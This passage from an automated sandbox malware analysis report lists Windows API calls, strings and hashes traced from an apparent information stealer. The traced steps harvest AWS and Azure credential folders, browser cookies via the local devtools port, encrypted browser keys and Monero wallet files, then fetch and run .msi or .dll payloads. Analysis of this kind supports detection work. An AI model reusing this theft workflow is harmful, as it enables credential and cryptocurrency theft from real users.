                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0019860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0019861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00198629
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 695b852e0998d637f899a6f3e04ea82be20b9fa1888577f7b5e06d72f47c79b2
                                        • Instruction ID: e214920878d5dbf858ec3209eaf5beed1ca7eec509cf205db500e506910b4c3d
                                        • Opcode Fuzzy Hash: 695b852e0998d637f899a6f3e04ea82be20b9fa1888577f7b5e06d72f47c79b2
                                        • Instruction Fuzzy Hash: B1812D719102189BDB28DB54DD95FEA77B8BF18700F5086E8F10AA6141DF70AB88CFE4
                                        APIs
                                          • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00195000
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 0019501D
                                          • Part of subcall function 00194B60: wsprintfA.USER32 ref: 00194B7C
                                          • Part of subcall function 00194B60: FindFirstFileA.KERNEL32(?,?), ref: 00194B93
                                        • lstrcat.KERNEL32(?,00000000), ref: 0019508C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 001950A9
                                          • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A0FC4), ref: 00194BC1
                                          • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A0FC8), ref: 00194BD7
                                          • Part of subcall function 00194B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00194DCD
                                          • Part of subcall function 00194B60: FindClose.KERNEL32(000000FF), ref: 00194DE2
                                        • lstrcat.KERNEL32(?,00000000), ref: 00195118
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00195135
                                          • Part of subcall function 00194B60: wsprintfA.USER32 ref: 00194C00
                                          • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A08D3), ref: 00194C15
                                          • Part of subcall function 00194B60: wsprintfA.USER32 ref: 00194C32
                                          • Part of subcall function 00194B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00194C6E
                                          • Part of subcall function 00194B60: lstrcat.KERNEL32(?,011CE928), ref: 00194C9A
                                          • Part of subcall function 00194B60: lstrcat.KERNEL32(?,001A0FE0), ref: 00194CAC
                                          • Part of subcall function 00194B60: lstrcat.KERNEL32(?,?), ref: 00194CC0
                                          • Part of subcall function 00194B60: lstrcat.KERNEL32(?,001A0FE4), ref: 00194CD2
                                          • Part of subcall function 00194B60: lstrcat.KERNEL32(?,?), ref: 00194CE6
                                          • Part of subcall function 00194B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00194CFC
                                          • Part of subcall function 00194B60: DeleteFileA.KERNEL32(?), ref: 00194D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: f90b0148544ee6caa6cf0b8660126510ee59501c17cb3fc3d9352e20d28405b3
                                        • Instruction ID: d4d80ec85cff33772e2b4c2908ff5965c01c30883e4b2787bad16eafc64bad70
                                        • Opcode Fuzzy Hash: f90b0148544ee6caa6cf0b8660126510ee59501c17cb3fc3d9352e20d28405b3
                                        • Instruction Fuzzy Hash: 3B4183BA94430867DF10F760EC57FDD73285B66705F404594B249A6082EFB4ABC88B92
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001991FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: image/jpeg
                                        • API String ID: 2244384528-3785015651
                                        • Opcode ID: bb2fe291c243e780142cdac4ba49165ee542b47c52a034b04613edc3ae990608
                                        • Instruction ID: e77e75ae8c35c7851c8fdfafbb82c467cc2e3e01c11011fd8e0acebb0a79cad7
                                        • Opcode Fuzzy Hash: bb2fe291c243e780142cdac4ba49165ee542b47c52a034b04613edc3ae990608
                                        • Instruction Fuzzy Hash: 5871ED71910208ABDB14EFE4EC89FEEB778BF58701F108568F516A7291DB34EA04CB64
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00193415
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 001935AD
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0019373A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: aebc0cd098a8d70853ffc43bc1436736a8acc7a564f7d3163d0d08ad515403df
                                        • Instruction ID: b619a1ceb65a4230b56784276bc476ecdabe366985c35e0245dea7db5a3d4250
                                        • Opcode Fuzzy Hash: aebc0cd098a8d70853ffc43bc1436736a8acc7a564f7d3163d0d08ad515403df
                                        • Instruction Fuzzy Hash: 0112EB719101189ACF19EBA0DDA2FEDB739AF24300F804599F50766192EF346B4DCBA5
                                        APIs
                                          • Part of subcall function 00189A50: InternetOpenA.WININET(001A0AF6,00000001,00000000,00000000,00000000), ref: 00189A6A
                                        • lstrcat.KERNEL32(?,cookies), ref: 00189CAF
                                        • lstrcat.KERNEL32(?,001A12C4), ref: 00189CC1
                                        • lstrcat.KERNEL32(?,?), ref: 00189CD5
                                        • lstrcat.KERNEL32(?,001A12C8), ref: 00189CE7
                                        • lstrcat.KERNEL32(?,?), ref: 00189CFB
                                        • lstrcat.KERNEL32(?,.txt), ref: 00189D0D
                                        • lstrlen.KERNEL32(00000000), ref: 00189D17
                                        • lstrlen.KERNEL32(00000000), ref: 00189D26
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                        • API String ID: 3174675846-3542011879
                                        • Opcode ID: 4d3c9a70b1cafe0641015cdeb988336d56ce905b3c457907436dd1aaf72aae2d
                                        • Instruction ID: d2f76aa3a5c804d6dd9e8fd218d6203562f30fae48d03fb61d839e6df3e16484
                                        • Opcode Fuzzy Hash: 4d3c9a70b1cafe0641015cdeb988336d56ce905b3c457907436dd1aaf72aae2d
                                        • Instruction Fuzzy Hash: 78517072910608ABCB14EBE0EC95FEE7738AF14301F4045A8F106A7091EF74AB49CF61
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 001862D0: InternetOpenA.WININET(001A0DFF,00000001,00000000,00000000,00000000), ref: 00186331
                                          • Part of subcall function 001862D0: StrCmpCA.SHLWAPI(?,011CE938), ref: 00186353
                                          • Part of subcall function 001862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
                                          • Part of subcall function 001862D0: HttpOpenRequestA.WININET(00000000,GET,?,011CE398,00000000,00000000,00400100,00000000), ref: 001863D5
                                          • Part of subcall function 001862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
                                          • Part of subcall function 001862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195568
                                        • lstrlen.KERNEL32(00000000), ref: 0019557F
                                          • Part of subcall function 00198FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00198FE2
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 001955B4
                                        • lstrlen.KERNEL32(00000000), ref: 001955D3
                                        • lstrlen.KERNEL32(00000000), ref: 001955FE
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: bfe7d74126f322b8bb91ebc743ce0634b958b8aac9305b8631dd5f3176e5b000
                                        • Instruction ID: bc9ba412777036f177b330b3c9eb46a4d882c803a3e1aa04122adf93c3676ec6
                                        • Opcode Fuzzy Hash: bfe7d74126f322b8bb91ebc743ce0634b958b8aac9305b8631dd5f3176e5b000
                                        • Instruction Fuzzy Hash: FA510E30914108EBCF18FFA0CDA6AED7779AF21341F904468F50667592EF306B09CB96
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: b090bbcf21e330c0308c8e4b418e49d84fbd6b94f4d9cd79944f667875c67fe4
                                        • Instruction ID: acc4abe1561c7409fbe2a946c364d47a7882844dfe057b10edb9ab28272cfe2e
                                        • Opcode Fuzzy Hash: b090bbcf21e330c0308c8e4b418e49d84fbd6b94f4d9cd79944f667875c67fe4
                                        • Instruction Fuzzy Hash: F5C152B5900219ABCF14EF60DC99FDE73B9BF64304F004599E50AA7252DB70EA89CF91
                                        APIs
                                          • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 0019453C
                                        • lstrcat.KERNEL32(?,011CE3F8), ref: 0019455B
                                        • lstrcat.KERNEL32(?,?), ref: 0019456F
                                        • lstrcat.KERNEL32(?,011CCE70), ref: 00194583
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 00198F20: GetFileAttributesA.KERNEL32(00000000,?,00181B94,?,?,001A577C,?,?,001A0E22), ref: 00198F2F
                                          • Part of subcall function 0018A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0018A489
                                          • Part of subcall function 0018A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                          • Part of subcall function 0018A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                          • Part of subcall function 0018A110: LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                          • Part of subcall function 0018A110: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                          • Part of subcall function 0018A110: LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                          • Part of subcall function 0018A110: CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                          • Part of subcall function 00199550: GlobalAlloc.KERNEL32(00000000,0019462D,0019462D), ref: 00199563
                                        • StrStrA.SHLWAPI(?,011CE2D8), ref: 00194643
                                        • GlobalFree.KERNEL32(?), ref: 00194762
                                          • Part of subcall function 0018A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A23F
                                          • Part of subcall function 0018A210: LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 0018A251
                                          • Part of subcall function 0018A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A27A
                                          • Part of subcall function 0018A210: LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 0018A28F
                                        • lstrcat.KERNEL32(?,00000000), ref: 001946F3
                                        • StrCmpCA.SHLWAPI(?,001A08D2), ref: 00194710
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00194722
                                        • lstrcat.KERNEL32(00000000,?), ref: 00194735
                                        • lstrcat.KERNEL32(00000000,001A0FA0), ref: 00194744
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: 9c58eb8da021535f3ea2368a11762592f2c19274dcda74692983f3b35a4e43dc
                                        • Instruction ID: 6a530b5bb44b622c249487f79165bc419dc94c4a9f6ec59a6d5c63a488aec99d
                                        • Opcode Fuzzy Hash: 9c58eb8da021535f3ea2368a11762592f2c19274dcda74692983f3b35a4e43dc
                                        • Instruction Fuzzy Hash: C47143B6900208ABDF14EBA0ED95FEE7379AF99300F4445A8F60597141EB34EB48CF95
                                        APIs
                                          • Part of subcall function 001812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001812B4
                                          • Part of subcall function 001812A0: RtlAllocateHeap.NTDLL(00000000), ref: 001812BB
                                          • Part of subcall function 001812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001812D7
                                          • Part of subcall function 001812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001812F5
                                          • Part of subcall function 001812A0: RegCloseKey.ADVAPI32(?), ref: 001812FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018134F
                                        • lstrlen.KERNEL32(?), ref: 0018135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00181377
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00181465
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 0018A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                          • Part of subcall function 0018A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                          • Part of subcall function 0018A110: LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                          • Part of subcall function 0018A110: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                          • Part of subcall function 0018A110: LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                          • Part of subcall function 0018A110: CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                        • DeleteFileA.KERNEL32(00000000), ref: 001814EF
                                        Strings
                                        Yara matches
                                        Similarity
